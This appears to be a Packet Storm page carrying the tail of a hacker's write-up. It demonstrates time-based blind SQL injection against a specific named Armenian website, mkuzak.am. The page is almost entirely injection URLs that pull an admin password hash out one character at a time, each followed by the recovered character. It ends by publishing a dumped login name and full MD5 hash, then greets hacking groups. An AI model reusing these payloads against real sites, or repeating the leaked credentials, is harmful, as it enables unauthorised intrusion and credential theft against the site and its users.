http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,14,1)='a',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

15-ci simvol: c

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,15,1)='c',sleep(1),0) from ulist limit 1,1)-- AnD 5='5

================================================

16-ci simvol: 9


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,16,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

17-ci simvol: 0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,17,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

18--ci simvol: 0


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,18,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD 5='5

================================================

19-cu simvol: 9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,19,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD 5='5




================================================

20-ci simvol: f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,20,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

21-ci simvol: e


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,21,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

22-c simvol: 3

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,22,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD 5='5

================================================


23-cu simvol: 6

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,23,1)='6',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

24-cu simvol: e

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,24,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

25-ci simvol: f


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,25,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

26-ci simvol: 0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,26,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

27-ci simvol: 0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,27,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

28-ci simvol: 7


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,28,1)='7',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

29-cu simvol: 2


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,29,1)='2',sleep(1),0) from ulist limit 1,1)-- AnD 5='5

================================================

30-cu simvol: 8

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,30,1)='8',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

31-ci simvol: 3

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,31,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

32-ci simvol: f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,32,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD 5='5

================================================

Login: mogin
MD5 HASH: e79d2f315e99cac9009fe36ef007283f
Qirilmadi hash:( Blya beddiydie basdan ayaga:*(

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,33)='e79d2f315e99cac9009fe36ef007283f',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


===========================================================



Enjoy)


SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
===========================================================

/AkaStep













Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close